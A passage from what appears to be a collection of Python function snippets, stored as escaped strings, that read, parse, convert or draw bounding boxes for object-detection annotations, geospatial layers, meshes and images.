None:\n crop_files = glob(base_filename + \"_bbox*\")\n if len(crop_files) == 1:\n crop = np.load(crop_files[0])\n elif len(crop_files) > 1:\n error(\"Crop file base '%s_bbox' matches multiple files\" % base_filename)\n return crop", "def read_bounding_boxes(filename):\n f = open(filename)\n objects = []\n weight = 0\n height = 0\n for line in f:\n print(line)\n first_word = line.split(';')[0]\n if first_word == \"Dimensions\":\n weight = line.split(';')[1]\n height = line.split(';')[2]\n if first_word == \"Object\":\n objects.append((line.split(';')[1], line.split(';')[2], line.split(';')[4],\n line.split(';')[5], line.split(';')[6], line.split(';')[7]))\n return weight, height, objects", "def getBoundingBox(filepath):\n datasource = ogr.Open(filepath)\n geo_dict = {}\n\n for layer in datasource:\n layer_name = layer.GetDescription()\n ext = layer.GetExtent()\n bbox = [ext[0], ext[2], ext[1], ext[3]]\n\n try:\n spatial_ref = layer.GetSpatialRef()\n spatial_ref.AutoIdentifyEPSG()\n crs = spatial_ref.GetAuthorityCode(None)\n except Exception as e:\n logger.debug(\"Error extracting EPSG CODE from layer {}: \\n {}\".format(layer_name, e))\n crs = None\n\n # Patch GDAL > 3.2 for GML https://github.com/OSGeo/gdal/issues/2195\n if int(osgeo.__version__[0]) >= 3 and int(osgeo.__version__[2]) < 2 and datasource.GetDriver().GetName() ==\"GML\":\n bbox = [ext[2], ext[0], ext[3], ext[1]]\n\n geo_dict[layer_name] = {\"bbox\": bbox, \"crs\": crs}\n\n if bbox == null_island or crs is None:\n logger.debug(\"Layer {} does not have identifiable geographic extent. CRS may be missing.\".format(layer_name))\n del geo_dict[layer_name][\"crs\"]\n\n bbox_merge = hf.bbox_merge(geo_dict, filepath)\n\n spatial_extent = None\n\n if bbox_merge is not None:\n if len(bbox_merge) != 0:\n spatial_extent = bbox_merge\n\n return spatial_extent", "def load_bb(filename):\n in_data = gdal.Open(filename, 0)\n geotransform = in_data.GetGeoTransform()\n nx = in_data.RasterXSize\n ny = in_data.RasterYSize\n return geotransform2bb(geotransform, nx, ny)", "def get_annotation_by_name(ImgName, df, default_size = (640,640)):\n ImgName = ImgName.split('.')[0] + '.jpg'\n bb_boxes = df[df['Frame'] == ImgName].reset_index()\n labels = np.zeros(len(bb_boxes))\n bbox = np.zeros((len(bb_boxes), 4))\n for i in range(len(bb_boxes)):\n #resize bbox to default size\n labels[i] = bb_boxes.iloc[i]['label']\n bbox[i,0] = bb_boxes.iloc[i]['center_x']\n bbox[i,1] = bb_boxes.iloc[i]['center_y']\n bbox[i,2] = bb_boxes.iloc[i]['w']\n bbox[i,3] = bb_boxes.iloc[i]['h']\n #print(bbox)\n #print(len(bb_boxes))\n return labels, bbox", "def getBoundingBox(fileList):\n return IrgGeoFunctions.getImageBoundingBox(fileList[0])", "def layer_bbox(m, names, proj_target, bbox=None):\n for layer in (l for l in m.layers if l.name in names):\n # it may as well be a GPX layer in WGS84\n layer_proj = mapnik.Projection(layer.srs)\n box_trans = mapnik.ProjTransform(layer_proj, proj_target)\n lbbox = box_trans.forward(layer.envelope())\n if bbox:\n bbox.expand_to_include(lbbox)\n else:\n bbox = lbbox\n return bbox", "def find_bbox(pred_file_path: str, train_file_path: str) -> Dict:\n\n f_pred = open(pred_file_path, \"r\")\n pred_result = f_pred.readlines()\n f_pred.close()\n\n img_index = get_img_index(pred_result)\n\n img_names = get_image_names(train_file_path)\n\n if len(img_index) - 1 != len(img_names):\n return \"There is mismatch between the number of predictions and the number of images.\"\n\n # Create dictionary with the img name as the key and the bbox information as values.\n target_labels = [\"TableCaption\", \"TableBody\", \"TableFootnote\", \"Paragraph\", \"Table\"]\n result = {}\n for i, name in enumerate(img_names):\n key = name\n start = img_index[i] + 1\n end = img_index[i + 1]\n unfiltered_value = pred_result[start:end]\n filtered_value = [\n v for v in unfiltered_value if v.split(\":\")[0] in target_labels\n ]\n result[key] = filtered_value\n\n return result", "def read_mesh_nodes_bbox(filename):\n nodes = read_mesh_nodes(filename)\n bbox = read_mesh_bbox(nodes=nodes)\n return nodes, bbox", "def get_bbox(im_file, visualize=False):\n im = cv2.imread(im_file)\n non_black_pixels = im.any(axis=-1).nonzero() \n bbox = [min(non_black_pixels[1][:]), min(non_black_pixels[0][:]),\n max(non_black_pixels[1][:]), max(non_black_pixels[0][:])]\n if visualize:\n vis_bbox(im, bbox)\n plt.show()\n return bbox", "def parseBoundaryField(fn):\n content = getFileContent(fn)\n if content is not None:\n return parseBoundaryContent(content)\n else:\n return None", "def geoBoundsMetadata(filename,format=\"shapefile\"):\n if format==\"shapefile\":\n with fiona.open(filename, 'r') as c:\n bnd= c.bounds\n bnd=(bnd[0],bnd[2],bnd[3],bnd[1])\n return \"ENVELOPE{0}\".format(bnd)\n\n else:\n with rasterio.open(filename,'r') as c:\n bnd= c.bounds\n bnd=(bnd[0],bnd[2],bnd[3],bnd[1])\n return \"ENVELOPE{0}\".format(bnd)", "def read_annotation_yolov5(bbox_path):\n\n # image_paths = get_lists_in_dir(rawImage_dir)\n\n dw = 1./(camera_resolution[0]) # 1 / image width\n dh = 1./(camera_resolution[1]) # 1 / image height\n\n # Read in bbox coordinate information from bbox_information.txt\n dimension_list = []\n with open(bbox_path, 'r') as annotation_file:\n content = annotation_file.read().splitlines()\n\n for n in content:\n # x = int(n.split()[0])+int(n.split()[2])/2\n # y = int(n.split()[1])+int(n.split()[3])/2\n # w = int(n.split()[2])\n # h = int(n.split()[3])\n #\n # x = x*dw\n # w = w*dw\n # y = y*dh\n # h = h*dh\n\n bb = n.split()\n w = int(bb[2])\n h = int(bb[3])\n\n start_x = int(bb[0])\n start_y = int(bb[1])\n\n center_x = start_x + w / 2\n center_y = start_y + h / 2\n\n x = center_x * dw\n y = center_y * dh\n w = w * dw\n h = h * dh\n \n dimension_list.append((x, y, w, h))\n\n return dimension_list", "def bbox_img(img, bbox):\n if len(bbox) == 4:\n return img[bbox[1]:bbox[3], bbox[0]:bbox[2]]\n else:\n return img", "def getbbox(self):\n pass", "def bbox_coordinates(label_sitk):\n\n #Setting Bounding Box\n F_statistics = sitk.LabelShapeStatisticsImageFilter()\n\n F_statistics.Execute(label_sitk)\n bbox_dims = F_statistics.GetBoundingBox(1)\n\n spacer = 3\n xmin = bbox_dims[0]-spacer\n xmax = bbox_dims[1]+spacer\n ymin = bbox_dims[2]-spacer\n ymax = bbox_dims[3]+spacer\n zmin = bbox_dims[4]-spacer\n zmax = bbox_dims[5]+spacer\n\n p1 = [xmin-spacer, ymin, zmin]\n p2 = [xmin, ymin, zmax]\n p3 = [xmin, ymax, zmin]\n p4 = [xmin, ymax, zmax]\n p5 = [xmax, ymin, zmin]\n p6 = [xmax, ymin, zmax]\n p7 = [xmax, ymax, zmin]\n p8 = [xmax, ymax, zmax]\n bbox_pts = [p1, p2, p3, p4, p5, p6, p7, p8]\n\n return bbox_pts", "def load_annotations(path, img_w, img_h):\n bboxes = []\n with open(path, 'r') as file:\n for row in file:\n _, xc , yc, w, h = row.split()\n xc = float(xc)*img_w\n yc = float(yc)*img_h\n w = float(w)*img_w\n h = float(h)*img_h\n bboxes.append([xc - w/2 , yc - h/2, xc + w/2 , yc + h/2])\n\n return bboxes", "def process_image_bbox(image, bbox, labels, file_name):\n bounds, classes, scores = postprocessing(bbox, image)\n image_processed = annotate(image, bounds, classes, scores, labels)\n image_processed.save(file_name, 'png')\n return image_processed", "def get_bboxes(self, image_path: str, img_pipeline=None):\n pass", "def bbox(self):\n return np.array(self.path.get_extents()).ravel(order='F')", "def get_bounding_box_from_xml_path(path: Path) -> np.ndarray:\n with open(path, mode=\"r\") as file:\n bs = BeautifulSoup(file, \"xml\")\n\n x_min = float(bs.bndbox.xmin.string)\n x_max = float(bs.bndbox.xmax.string)\n y_min = float(bs.bndbox.ymin.string)\n y_max = float(bs.bndbox.ymax.string)\n\n return np.array([x_min, y_min, x_max - x_min, y_max - y_min])", "def getBoundingBoxes():\n allBoundingBoxes = BoundingBoxes()\n import glob\n import os\n # Read ground truths\n pth = \"../Wildtrack_dataset/annotations_positions/*.json\"\n files = glob.glob(pth)\n files.sort()\n # Class representing bounding boxes (ground truths and detections)\n allBoundingBoxes = BoundingBoxes()\n # Read GT detections from txt files\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for idx, f in enumerate(files):\n with open(f) as j:\n data = json.load(j)\n # print(f)\n for d in data:\n for v in d['views']:\n if v['viewNum'] != 0 or v['xmax'] == -1:\n continue\n\n idClass = 'person' # class\n x = float(v['xmin']) # confidence\n y = float(v['ymin'])\n w = float(v['xmax'])\n h = float(v['ymax'])\n bb = BoundingBox(\n str(idx),\n idClass,\n x,\n y,\n w,\n h,\n CoordinatesType.Absolute, (1920, 1080),\n BBType.GroundTruth,\n format=BBFormat.XYX2Y2)\n allBoundingBoxes.addBoundingBox(bb)\n \n\n\n # Read detections\n with open(\"wildtrack_yolo_tiny.out\", \"rb\") as fin:\n pred = pickle.load(fin)\n for idx, (k, value) in enumerate(pred.items()):\n for d in value:\n if d['tag'] != \"person\":\n continue\n \n box = d['box']\n idClass = 'person' # class\n x = float(box[0]) # confidence\n y = float(box[1])\n w = float(box[2])\n h = float(box[3])\n bb = BoundingBox(\n str(idx),\n idClass,\n x,\n y,\n w,\n h,\n CoordinatesType.Absolute, (1920, 1080),\n BBType.Detected,\n d['score'],\n format=BBFormat.XYX2Y2)\n allBoundingBoxes.addBoundingBox(bb)\n return allBoundingBoxes", "def getBBox(self, detector_name):\n if not hasattr(self, '_bbox_cache'):\n self._bbox_cache = {}\n\n if detector_name not in self._bbox_cache:\n dm_bbox = self._camera[detector_name].getBBox()\n dm_min = dm_bbox.getMin()\n dm_max = dm_bbox.getMax()\n cam_bbox = geom.Box2I(minimum=geom.Point2I(dm_min[1], dm_min[0]),\n maximum=geom.Point2I(dm_max[1], dm_max[0]))\n\n self._bbox_cache[detector_name] = cam_bbox\n\n return self._bbox_cache[detector_name]", "def parse_filename(cls, filename):\n #from nose.tools import set_trace; set_trace()\n m = re.match(cls._pattern, os.path.basename(filename))\n basename = m.group(1)\n bandname = cls._bandmap.get(m.group(2), m.group(2))\n return basename, bandname", "def boundingbox_location_change(boundingbox, file_name, dir):\n root = dir\n jpgfile = file_name[0:-3]+'jpg'\n img = cv2.imread(root+jpgfile)\n shape = img.shape\n print (img.shape)\n print boundingbox\n new_boundingbox = []\n\n for b in boundingbox:\n axis = b.split(' ')\n x = float(axis[1])\n x = x * shape[0]\n y = float(axis[2])\n y = y*shape[1]\n width = float(axis[3])\n width = width * shape[0]\n heights = float(axis[4])\n heights = heights * shape[1]\n\n xmin = x - 0.5*width\n ymin = y - 0.5*heights\n xmax = x + 0.5*width\n ymax = y + 0.5*heights\n new_b = [int(xmin), int(ymin), int(xmax), int(ymax)]\n new_boundingbox.append(new_b)\n return new_boundingbox", "def getBoundingBoxesForFile(filepath,\n isGT,\n bbFormat,\n coordType,\n allBoundingBoxes=None,\n allClasses=None,\n imgSize=(0, 0),\n header=True):\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n nameOfImage = filepath.replace(\".txt\", \"\")\n fh1 = open(filepath, \"r\")\n if header is True:\n header_line = fh1.readline()\n header_split = header_line.split(';')\n assert len(header_split) > 0\n height = header_split[0].split(':')[-1]\n width = header_split[1].split(':')[-1]\n if height is None or width is None:\n logger.warning(\"Height or width None!\")\n else:\n imgSize = (width, height)\n\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n\n splitLine = line.split(\" \")\n if isGT:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat,\n bbox_id=ann_id)\n else:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n confidence = float(splitLine[2])\n x = float(splitLine[3])\n y = float(splitLine[4])\n w = float(splitLine[5])\n h = float(splitLine[6])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat,\n bbox_id=ann_id)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses", "def read_mesh_bbox(filename=None, nodes=None):\n if filename != None:\n nodes = read_mesh_nodes(filename)\n return np.array([[np.min(nodes[:,0]), np.min(nodes[:,1]), np.min(nodes[:,2])],\n [np.max(nodes[:,0]), np.max(nodes[:,1]), np.max(nodes[:,2])]])", "def fromFile(filepath, bbox=True, tbox=True, num_sample=None):\n logger.info(\"Extracting bbox={} tbox={} from file {}\".format(bbox, tbox, filepath))\n\n if not bbox and not tbox:\n logger.error(\"Require at least one of extraction options, but bbox is {} and tbox is {}\".format(bbox, tbox))\n raise Exception(\"No extraction options enabled!\")\n\n file_format = os.path.splitext(filepath)[1][1:]\n\n usedModule = None\n\n # initialization of later output dict\n metadata = {}\n\n # get the module that will be called (depending on the format of the file)\n\n for i in handle_modules:\n valid = handle_modules[i].checkFileSupported(filepath)\n if valid:\n usedModule = handle_modules[i]\n logger.info(\"{} is being used to inspect {} file\".format(usedModule.get_handler_name(), filepath))\n break\n\n # If file format is not supported\n if not usedModule:\n logger.info(\"Did not find a compatible module for file format {} of file {}\".format(file_format, filepath))\n return None\n\n # get Bbox, Temporal Extent, Vector representation and crs parallel with threads\n class thread(threading.Thread):\n def __init__(self, task):\n threading.Thread.__init__(self)\n self.task = task\n\n def run(self):\n\n metadata[\"format\"] = file_format\n metadata[\"geoextent_handler\"] = usedModule.get_handler_name()\n\n # with lock:\n\n logger.debug(\"Starting thread {} on file {}\".format(self.task, filepath))\n if self.task == \"bbox\":\n try:\n if bbox:\n spatial_extent = compute_bbox_wgs84(usedModule, filepath)\n if spatial_extent is not None:\n metadata[\"bbox\"] = spatial_extent['bbox']\n metadata[\"crs\"] = spatial_extent['crs']\n except Exception as e:\n logger.warning(\"Error for {} extracting bbox:\\n{}\".format(filepath, str(e)))\n elif self.task == \"tbox\":\n try:\n if tbox:\n if usedModule.get_handler_name() == 'handleCSV':\n extract_tbox = usedModule.getTemporalExtent(filepath, num_sample)\n else:\n if num_sample is not None:\n logger.warning(\"num_sample parameter is ignored, only applies to CSV files\")\n extract_tbox = usedModule.getTemporalExtent(filepath)\n if extract_tbox is not None:\n metadata[\"tbox\"] = extract_tbox\n except Exception as e:\n logger.warning(\"Error extracting tbox, time format not found \\n {}:\".format(str(e)))\n else:\n raise Exception(\"Unsupported thread task {}\".format(self.task))\n logger.debug(\"Completed thread {} on file {}\".format(self.task, filepath))\n\n thread_bbox_except = thread(\"bbox\")\n thread_temp_except = thread(\"tbox\")\n\n logger.debug(\"Starting 2 threads for extraction.\")\n\n thread_bbox_except.start()\n thread_temp_except.start()\n\n thread_bbox_except.join()\n thread_temp_except.join()\n\n logger.debug(\"Extraction finished: {}\".format(str(metadata)))\n\n return metadata", "def get_bbox(meta_data: List) -> List:\n\n x = [v for v in meta_data[0].split(\" \") if v][0]\n y = [v for v in meta_data[1].split(\" \") if v][0]\n w = [v for v in meta_data[2].split(\" \") if v][0]\n h = meta_data[3].replace(\")\", \"\").strip(\" \")\n\n return [x, y, w, h]", "def parse_bids_filename(filename: str) -> dict:\n parsed = {}\n results = list(re.search(bids_pattern, filename).groups())\n parsed[\"ext\"] = results.pop()\n while results:\n item = results.pop()\n if item is not None:\n parsed.update(_parse_segment(item))\n return parsed", "def bbox(self, idx):\n row = self.table.iloc[idx]\n bbox = row['bbox']\n return bbox", "def parse_bboxes(ann, classes):\n\n names, xmins, ymins, xmaxs, ymaxs = [], [], [], [], []\n ann_root = ann.getroot()\n\n for name in ann_root.iter('name'):\n names.append(np.float32(classes.index(name.text)))\n\n for xmin in ann_root.iter('xmin'):\n xmins.append(np.float32(xmin.text))\n\n for ymin in ann_root.iter('ymin'):\n ymins.append(np.float32(ymin.text))\n\n for xmax in ann_root.iter('xmax'):\n xmaxs.append(np.float32(xmax.text))\n\n for ymax in ann_root.iter('ymax'):\n ymaxs.append(np.float32(ymax.text))\n\n return np.column_stack((xmins, ymins, xmaxs, ymaxs, names))", "def extract_data(filename: str, directory: str) -> Dict:\n with open(filename) as f:\n lines = f.readlines()\n\n # Split data by :\n annotations = [line.replace(\" \", \"\").split(\":\") for line in lines]\n\n # Split data by ;\n for annotation in annotations:\n annotation[1] = annotation[1].split(\";\")\n\n # Loop for saving metadata into dictionary\n annot_dict = dict()\n for annotation in annotations:\n img = annotation[0]\n bbox_metadata = annotation[1]\n bbox = list()\n \n # Path to images\n img_path = os.path.join(directory, img)\n im = Image.open(img_path)\n width, height = im.size\n\n # Iterate over each bounding box\n for annot in bbox_metadata:\n \n if \"MISC_SIGNS\" == annot:\n signStatus = 'N/A'\n signTypes = \"MISC_SIGNS\"\n signPurpose = 'N/A'\n\n signBB = (-1, -1, -1, -1)\n signC = (-1, -1)\n signSize = 0\n aspectRatio = 0\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n elif \"\\n\" in annot:\n pass\n else:\n data = annot.split(\",\")\n \n signStatus = data[0] # signStatus\n signTypes = data[6] # signTypes\n signPurpose = data[5] # PROHIBITORY, WARNING, OTHER, INFORMATION\n tl_x, tl_y, br_x, br_y = data[3], data[4], data[1], data[2]\n \n if is_valid_decimal(tl_x):\n tl_x = float(tl_x)\n else:\n tl_x = float(cutoff_letter(tl_x))\n\n if is_valid_decimal(tl_y):\n tl_y = float(tl_y)\n else:\n tl_y = float(cutoff_letter(tl_y))\n\n if is_valid_decimal(br_x):\n br_x = float(br_x)\n else:\n br_x = float(cutoff_letter(br_x))\n\n if is_valid_decimal(br_y):\n br_y = float(br_y)\n else:\n br_y = float(cutoff_letter(br_y))\n\n if tl_x < 0:\n tl_x = 0\n elif tl_x > width:\n tl_x = width\n \n if tl_y < 0:\n tl_y = 0\n elif tl_y > height:\n tl_y = height\n \n if br_x < 0:\n br_x = 0\n elif br_x > width:\n br_x = width\n \n if br_y < 0:\n br_y = 0\n elif br_y > height:\n br_y = height\n\n signBB = (tl_x, tl_y, br_x, br_y)\n signC = (br_x + tl_x)/2, (br_y + tl_y)/2\n signSize = (br_x - tl_x) * (br_y - tl_y)\n aspectRatio = (br_x - tl_x) / (br_y - tl_y)\n\n bbox.append({\"signStatus\": signStatus, \n \"signTypes\": signTypes, \n \"signPurpose\": signPurpose, \n \"signBB\": signBB, \n \"signC\": signC, \n \"signSize\": signSize, \n \"aspectRatio\": aspectRatio})\n \n \n annot_dict[img_path] = bbox\n return annot_dict", "def bbox2fields():\n bbox2label = {\n 'gt_bboxes': 'gt_labels',\n 'gt_bboxes_ignore': 'gt_labels_ignore'\n }\n bbox2mask = {\n 'gt_bboxes': 'gt_masks',\n 'gt_bboxes_ignore': 'gt_masks_ignore'\n }\n bbox2seg = {\n 'gt_bboxes': 'gt_semantic_seg',\n }\n return bbox2label, bbox2mask, bbox2seg", "def bbox(x):\n if ispoint(x):\n return pointbbox(x)\n elif isline(x):\n return linebbox(x)\n elif isarc(x):\n return arcbbox(x)\n elif ispoly(x):\n return polybbox(x)\n elif isgeomlist(x):\n return geomlistbbox(x)\n else:\n raise ValueError(\"inappropriate type for bbox(): \",format(x))", "def get_frame_bbox(annotations_dir, seq):\n root_dir = \"/home/sdb/wangshentao/myspace/thesis/data/VisDrone2019-MOT-test-dev/\"\n bbox = []\n frame_id = []\n trace_bbox = []\n trace_frame_id = []\n annotations_dir = root_dir + 'annotations/'\n gt_txt = os.path.join(annotations_dir, seq)\n gt = np.loadtxt(gt_txt, dtype=np.float64, delimiter=',')\n tid_last = gt[0][1]\n for fid, tid, x, y, w, h, mark, label, _, _ in gt:\n if int(mark) == 0 or int(label) == 0 or int(label) == 11:\n continue\n if tid == tid_last:\n trace_bbox.append([x, y, w, h])\n trace_frame_id.append(fid)\n else:\n tid_last = tid\n if len(trace_bbox) > 1:\n bbox.append(np.array(trace_bbox))\n frame_id.append(np.array(trace_frame_id))\n trace_bbox = [[x, y, w, h]]\n trace_frame_id = [fid]\n\n return bbox, frame_id", "def show_bounding_boxes(dir_path: str) -> None:\r\n \r\n for image_file in glob.glob(dir_path + '/*.png'):\r\n image = cv2.imread(image_file)\r\n height, width, _ = image.shape\r\n\r\n with open(image_file.split(\".\")[0] +'.txt', 'r') as reader:\r\n annotations = reader.readlines()\r\n for annot in annotations:\r\n annot = annot.split()\r\n \r\n # Calculation of top left point and bottom right point of the bounding box \r\n x1, y1 = int((float(annot[1]) - float(annot[3])/2)*width), int((float(annot[2]) - float(annot[4])/2)*height)\r\n x2, y2 = int((float(annot[1]) + float(annot[3])/2)*width), int((float(annot[2]) + float(annot[4])/2)*height)\r\n \r\n # BGR color format\r\n if annot[0] == '0':\r\n color = (0,255,0) # Mask is worn correctly (Green color)\r\n label = 'Good'\r\n else:\r\n color = (0,0,255) # Mask is either not worn correctly or not worn at all (Red color)\r\n label = 'Bad'\r\n \r\n cv2.putText(image,\r\n label, \r\n (x1, y1 - 10),\r\n fontFace=cv2.FONT_HERSHEY_TRIPLEX,\r\n fontScale=0.5, \r\n color=color,\r\n thickness=1) \r\n \r\n cv2.rectangle(image, (x1, y1), (x2, y2), color, thickness=1)\r\n \r\n k = cv2.waitKey(0) & 0xFF\r\n cv2.imshow(image_file.split(\"sss\")[-1], image)\r\n if k == 27:\r\n cv2.destroyAllWindows()\r\n break", "def bbox(img):\n a = np.where(img != 0)\n bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])\n return bbox", "def _decode_bbox(self, normalized_bbox):\n #apply the inverse of transformation\n y1,x1,y2,x2 = preprocess.apply_transformation(normalized_bbox,\n np.linalg.inv(self.transformation))\n\n w,h = self.image_size\n y1,x1,y2,x2 = y1*h,x1*w,y2*h,x2*w\n return vot.Rectangle(x1,y1,x2-x1,y2-y1)", "def get_bbox(self):\n dimsizes = self.get_full_dimensions('lon').values()\n slices = [slice(None, None, dimsizes[0] - 1),\n slice(None, None, dimsizes[1] - 1)]\n lon = self.read_values('lon', slices=slices)\n lat = self.read_values('lat', slices=slices)\n return (lon.min(), lat.min(), lon.max(), lat.max())", "def bbox_format(self) -> bbox_utils.BBoxFormat:\n raise NotImplementedError", "def gt_multi_txt(path, bboxes): \n \n W, H = Image.open(path).size\n\n lines_out=[]\n for obj_info in bboxes:\n label = 0 #obj_info['name']\n xmin, ymin, xmax, ymax = obj_info['bbox']\n\n cx = '%.3f' % np.clip(((xmax+xmin)/2)/W,0,1)\n cy = '%.3f' % np.clip(((ymax+ymin)/2)/H,0,1)\n w = '%.3f' % np.clip((xmax-xmin)/W ,0,1)\n h = '%.3f' % np.clip((ymax-ymin)/H ,0,1)\n\n lines_out.append(' '.join([str(label),cx,cy,w,h,'\\n']))\n\n return lines_out", "def bbox_size(label_sitk):\n\n # Setting Bounding Box\n F_statistics = sitk.LabelShapeStatisticsImageFilter()\n\n F_statistics.Execute(label_sitk)\n bbox_dims = F_statistics.GetBoundingBox(1)\n return list(bbox_dims[3:6])", "def get_bb(self,bbname, mol = False):\n lines = self.mfp.get_bb(bbname)\n return lines", "def getBoundingBoxes(directory,\n bbFormat,\n coordType,\n isGT=False,\n allBoundingBoxes=None,\n allClasses=None,\n imgSize=(0, 0),\n header=True):\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n # Read ground truths\n os.chdir(directory)\n files = glob.glob(\"*.txt\")\n files.sort()\n # Read GT detections from txt file\n # Each line of the files in the groundtruths folder represents a ground truth bounding box\n # (bounding boxes that a detector should detect)\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for f in files:\n nameOfImage = f.replace(\".txt\", \"\")\n fh1 = open(f, \"r\")\n\n if header is True:\n header_line = fh1.readline()\n header_split = header_line.split(';')\n assert len(header_split) > 0\n try:\n height = header_split[0].split(':')[-1]\n width = header_split[1].split(':')[-1]\n except IndexError as e:\n logger.error('error for header split of {} in {}: {}'.format(f, directory, header_split))\n raise\n imgSize = (width, height)\n\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n splitLine = line.split(\" \")\n if isGT:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat,\n bbox_id=ann_id)\n else:\n # idClass = int(splitLine[0]) #class\n ann_id = int(splitLine[0])\n idClass = (splitLine[1]) # class\n confidence = float(splitLine[2])\n x = float(splitLine[3])\n y = float(splitLine[4])\n w = float(splitLine[5])\n h = float(splitLine[6])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat,\n bbox_id=ann_id)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses", "def split_filename(path):\n filename = os.path.basename(path)\n name, extension = os.path.splitext(filename)\n region = name.split('.')[0]\n\n return region, name, extension", "def bnd_info(self):\n if self._bnd_info is None:\n if self.boundary_file is not None:\n self._bnd_info = self.get_bnd_value()\n else:\n raise TelemacException(\\\n \"Can not read bnd_info no boundary file was given\")\n\n return self._bnd_info", "def get_document_bounds(image_file, feature):\n # client = vision.ImageAnnotatorClient()\n\n bounds = []\n\n\n# No need for this .... \n # with io.open(image_file, 'rb') as image_file:\n # content = image_file.read()\n\n # image = types.Image(content=content)\n\n # response = client.document_text_detection(image=image)\n # document = response.full_text_annotation\n\n # with open('8130processed.json', 'w') as outfile:\n # outfile.write(MessageToJson(response))\n\n\n# We already have the document bounds of the image inside of 8130processed.json no\n\n f = open ('processed_8130-1output-1-to-1.json', \"r\")\n data = json.load(f)\n datas=json.dumps(data)\n # print(data)\n\n response = json_format.Parse(datas, vision.types.AnnotateFileResponse())\n # print(response)\n document = response.inputConfig\n # Collect specified feature bounds by enumerating all document features\n for page in document.pages:\n for block in page.blocks:\n for paragraph in block.paragraphs:\n for word in paragraph.words:\n for symbol in word.symbols:\n if (feature == FeatureType.SYMBOL):\n bounds.append(symbol.bounding_box)\n\n if (feature == FeatureType.WORD):\n bounds.append(word.bounding_box)\n\n if (feature == FeatureType.PARA):\n bounds.append(paragraph.bounding_box)\n\n if (feature == FeatureType.BLOCK):\n bounds.append(block.bounding_box)\n\n # The list `bounds` contains the coordinates of the bounding boxes.\n return bounds", "def get_boxes_for_id(voc_path, image_id):\n fname = os.path.join(voc_path, 'obj/{}.txt'.format(image_id))\n\n boxes = []\n with open(fname) as txt_file:\n for line in txt_file.readlines():\n if(len(line) < 1):\n continue\n try:\n elems = line.split(' ')\n bbox = [\n float(elems[1]),\n float(elems[2]),\n float(elems[3]),\n float(elems[4]),\n int(elems[0]),\n ]\n boxes.append(bbox)\n except:\n \"problem with get boxes from file: \" + str(fname) \n \n\n return np.array(boxes)", "def bbox_json_parse(json_path: str):\n labels = []\n bboxes = []\n with open(json_path) as json_file:\n json_data = json.load(json_file)\n for bbox in json_data:\n # assert bbox['train_id'] < 255, f\"invalid id {bbox['train_id']}\"\n if bbox['train_id'] < 19:\n labels.append(bbox['train_id'])\n bboxes.append(bbox['bbox'])\n\n return labels, bboxes", "def parseFilename(self, filename):\r\n match = self.filename_regex.match(filename)\r\n if match is None:\r\n # TODO?: Raise exception?\r\n '''print \"Filename\", filename, \"unrecognized!\"'''\r\n return None\r\n lat = int(match.group(2))\r\n lon = int(match.group(4))\r\n if match.group(1) == \"S\":\r\n lat = -lat\r\n if match.group(3) == \"W\":\r\n lon = -lon\r\n return lat, lon", "def choose_mask(self, bboxFile):\n f = open(bboxFile, 'r')\n content = f.read().split('\\n')\n ind = np.random.randint(len(content) - 1)\n line = content[ind]\n words = line.split(',')\n\n maskFile = words[0]\n maskCoord = []\n\n for item in words[1:]:\n item = util.strip_paren(item)\n item = item.lstrip().rstrip()\n maskCoord.append(item)\n\n f.close()\n\n return maskFile, maskCoord", "def bbox(self, image_coords=False):\n matrix = self.contours_to_matrix()\n bbox = np.c_[matrix.min(axis=0), matrix.max(axis=0)]\n return bbox if not image_coords else bbox[[1,0,2]]", "def _get_info_from_filename(filename: str) -> dict:\n *parts, suffix = filename.split('.')\n dct = re.match(r'^(?P<name>[A-z0-9.]*)(-(?P<num_rows>[0-9]+))?$', '.'.join(parts)).groupdict()\n return {\n 'name': dct['name'],\n 'num_rows': int(dct['num_rows']) if dct['num_rows'] else None,\n 'format': suffix,\n }", "def return_bbox_image(self, image, bboxes, label, color):\n if bboxes:\n for obj in bboxes:\n image = self.draw_single_bbox(image, obj.position_xywh, label=label, color=color)\n\n return image", "def read_image(image_path):\n\n image_path = LOCAL_ROOT + image_path\n\n img = cv2.imread(image_path)\n # Get the shape of input image\n real_h,real_w,c = img.shape\n assert 